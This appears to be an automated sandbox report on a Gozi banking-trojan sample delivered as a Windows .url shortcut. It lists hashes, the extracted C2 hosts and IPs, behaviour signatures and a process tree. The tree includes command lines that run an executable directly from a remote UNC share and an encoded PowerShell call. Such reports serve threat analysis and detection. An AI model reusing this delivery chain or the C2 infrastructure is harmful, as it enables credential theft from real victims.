Overview

overview

10

Static

static

Agenzia/Agenzia.url

windows7-x64

3

Agenzia/Agenzia.url

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/01/2023, 11:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Agenzia/Agenzia.url

  • Size

    198B

  • MD5

    8255e59c6627179ac30097e560a27251

  • SHA1

    6d9450bf771036d2437830ad2c1298a2039c9042

  • SHA256

    ac62dd1a56f4c94f7c8ef5764eefd66a9ddc7fe0d6335d2db15486a7410a1003

  • SHA512

    64472b0984cafb121e9603b13ca14438e9f126e75815e0c4712a110e18fd093015e6c5b06a0f92c7e14abcf10fb9908f38a80818acbeee1f4c7a003f89343d30

Score
10/10
gozi7704bankerisfbpersistencetrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

7704

C2

checklist.skype.com

62.173.149.202

31.41.44.158

193.0.178.157
Attributes
  • base_path

    /drew/

  • build

    250249

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.url
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4712
    • \??\UNC\62.173.147.10\Agenzia\Informazion.exe
      "\\62.173.147.10\Agenzia\Informazion.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:752
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3116
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3604
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
          4⤵
          • Executes dropped EXE
          PID:380
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
          4⤵
          • Executes dropped EXE
          PID:4412

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
    Filesize

    362.4MB

    MD5

    b405b1565194722f9457002c4edacbae

    SHA1

    3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

    SHA256

    c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

    SHA512

    bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
    Filesize

    362.4MB

    MD5

    b405b1565194722f9457002c4edacbae

    SHA1

    3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

    SHA256

    c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

    SHA512

    bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
    Filesize

    362.4MB

    MD5

    b405b1565194722f9457002c4edacbae

    SHA1

    3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

    SHA256

    c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

    SHA512

    bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
    Filesize

    362.4MB

    MD5

    b405b1565194722f9457002c4edacbae

    SHA1

    3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

    SHA256

    c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

    SHA512

    bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

    Download Submit

  • memory/3116-138-0x0000000005220000-0x00000000052B2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3116-139-0x00000000052E0000-0x00000000052EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3116-140-0x000000000CBA0000-0x000000000CBC2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3116-136-0x0000000000870000-0x0000000000878000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3116-137-0x0000000005720000-0x0000000005CC4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3604-147-0x0000000007C90000-0x000000000830A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3604-146-0x00000000065D0000-0x00000000065EE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3604-144-0x00000000056B0000-0x0000000005716000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3604-148-0x0000000006B50000-0x0000000006B6A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3604-143-0x0000000005810000-0x0000000005E38000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3604-142-0x0000000002FD0000-0x0000000003006000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3604-145-0x0000000005FB0000-0x0000000006016000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4412-152-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/4412-155-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/4412-156-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/4412-157-0x0000000000E90000-0x0000000000E9D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/4412-160-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

    Download